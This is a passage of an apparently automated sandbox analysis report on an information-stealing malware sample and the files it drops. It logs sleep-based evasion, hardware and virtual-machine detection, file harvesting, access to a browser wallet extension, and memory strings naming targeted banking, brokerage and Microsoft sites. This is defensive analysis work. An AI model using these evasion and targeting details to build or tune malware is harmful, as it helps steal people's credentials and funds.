                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -50369s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -34545s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -32290s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -33848s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -47786s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -58405s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -34941s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -33907s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -38409s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -51860s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -51359s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -40632s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -58117s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -50533s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -32745s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -49953s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -56784s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -50232s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BaseBoard
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UUID FROM Win32_ComputerSystemProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0041D9E1 FindFirstFileExA,0_2_0041D9E1
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0421DC48 FindFirstFileExA,0_2_0421DC48
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00412570
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040D1C0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_004015C0 LocalAlloc,FindFirstFileA,StrCmpCA,StrCmpCA,SetThreadLocale,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_004015C0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,2_2_00411650
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,2_2_0040B610
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_0040DB60
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_00411B80
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040D540
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,2_2_004121F0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_00401120 GetSystemInfo,ExitProcess,2_2_00401120
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 60000
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 53874
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59890
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 57608
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59781
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59111
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59671
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 44011
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 47282
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 32657
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 55485
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 43046
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 53111
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 39048
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 46051
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 51437
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 60000
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 34940
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 48880
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 32908
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 49361
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 30362
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 42157
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59306
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 47638
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 48814
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 40775
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 55633
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 52352
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 56019
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 33590
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 40863
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 53974
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 33780
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 48195
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 42226
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 60000
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37752
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59888
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36076
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59777
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 43255
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36426
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 48677
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 49214
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 46805
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59171
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 49003
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 50551
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 51632
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 30288
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 40188
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 50369
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 34545
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 32290
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 33848
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 47786
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 58405
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 34941
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 33907
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38409
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 51860
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 51359
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 40632
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 58117
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 50533
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 32745
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 49953
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 56784
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 50232
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                            Source: MSBuild.exe, 00000012.00000002.3296409281.00000000016BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllMS
                            Source: cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006B31000.00000004.00000020.00020000.00000000.sdmp, u3z0.1.exe, 00000009.00000000.2257557220.000000000041C000.00000020.00000001.01000000.00000012.sdmpBinary or memory string: Datacenter without Hyper-V Core
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                            Source: cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
                            Source: u3z0.0.exe, 00000002.00000002.2461047070.000000002A8B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                            Source: 4BfhCycV4B.exe, 00000000.00000002.2435145473.00000000043A5000.00000004.00000020.00020000.00000000.sdmp, 4BfhCycV4B.exe, 00000000.00000003.2264464647.000000000434A000.00000004.00000020.00020000.00000000.sdmp, u3z0.0.exe, 00000002.00000002.2435664162.0000000004457000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                            Source: cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
                            Source: cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
                            Source: u3z0.1.exe, 00000009.00000000.2257557220.000000000041C000.00000020.00000001.01000000.00000012.sdmpBinary or memory string: VMWARE_VIRTUAL
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                            Source: 4BfhCycV4B.exe, 00000000.00000002.2435599526.0000000005E22000.00000004.00000020.00020000.00000000.sdmp, 4BfhCycV4B.exe, 00000000.00000003.2266925414.0000000005E22000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V
                            Source: cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                            Source: u3z0.0.exe, 00000002.00000002.2461047070.000000002A8B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004402000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006B31000.00000004.00000020.00020000.00000000.sdmp, u3z0.1.exe, 00000009.00000000.2257557220.000000000041C000.00000020.00000001.01000000.00000012.sdmpBinary or memory string: Datacenter without Hyper-V Full
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006B31000.00000004.00000020.00020000.00000000.sdmp, u3z0.1.exe, 00000009.00000000.2257557220.000000000041C000.00000020.00000001.01000000.00000012.sdmpBinary or memory string: Enterprise without Hyper-V Full
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006B31000.00000004.00000020.00020000.00000000.sdmp, u3z0.1.exe, 00000009.00000000.2257557220.000000000041C000.00000020.00000001.01000000.00000012.sdmpBinary or memory string: Microsoft Hyper-V Server
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006B31000.00000004.00000020.00020000.00000000.sdmp, u3z0.1.exe, 00000009.00000000.2257557220.000000000041C000.00000020.00000001.01000000.00000012.sdmpBinary or memory string: QEMU_HARDU
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006B31000.00000004.00000020.00020000.00000000.sdmp, u3z0.1.exe, 00000009.00000000.2257557220.000000000041C000.00000020.00000001.01000000.00000012.sdmpBinary or memory string: Standard without Hyper-V Full
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006B31000.00000004.00000020.00020000.00000000.sdmp, u3z0.1.exe, 00000009.00000000.2257557220.000000000041C000.00000020.00000001.01000000.00000012.sdmpBinary or memory string: Enterprise without Hyper-V Core
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                            Source: cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                            Source: u3z0.0.exe, 00000002.00000002.2461047070.000000002A8B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004402000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                            Source: u3z0.0.exe, 00000002.00000002.2461047070.000000002A8B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                            Source: u3z0.1.exe, 00000009.00000003.2654917994.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3480786777.0000013E51F56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006B31000.00000004.00000020.00020000.00000000.sdmp, u3z0.1.exe, 00000009.00000000.2257557220.000000000041C000.00000020.00000001.01000000.00000012.sdmpBinary or memory string: 6without Hyper-V for Windows Essential Server Solutions
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006B31000.00000004.00000020.00020000.00000000.sdmp, u3z0.1.exe, 00000009.00000000.2257557220.000000000041C000.00000020.00000001.01000000.00000012.sdmpBinary or memory string: Standard without Hyper-V Core
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                            Source: MSBuild.exe, 00000012.00000002.3318395339.000000000378E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeAPI call chain: ExitProcess graph end nodegraph_2-58454
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeAPI call chain: ExitProcess graph end nodegraph_2-58457
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeAPI call chain: ExitProcess graph end nodegraph_2-58483
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeAPI call chain: ExitProcess graph end nodegraph_2-59500
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeAPI call chain: ExitProcess graph end nodegraph_2-58468
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeAPI call chain: ExitProcess graph end nodegraph_2-58475
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeAPI call chain: ExitProcess graph end nodegraph_2-58507
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeProcess information queried: ProcessInformation
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00409A73
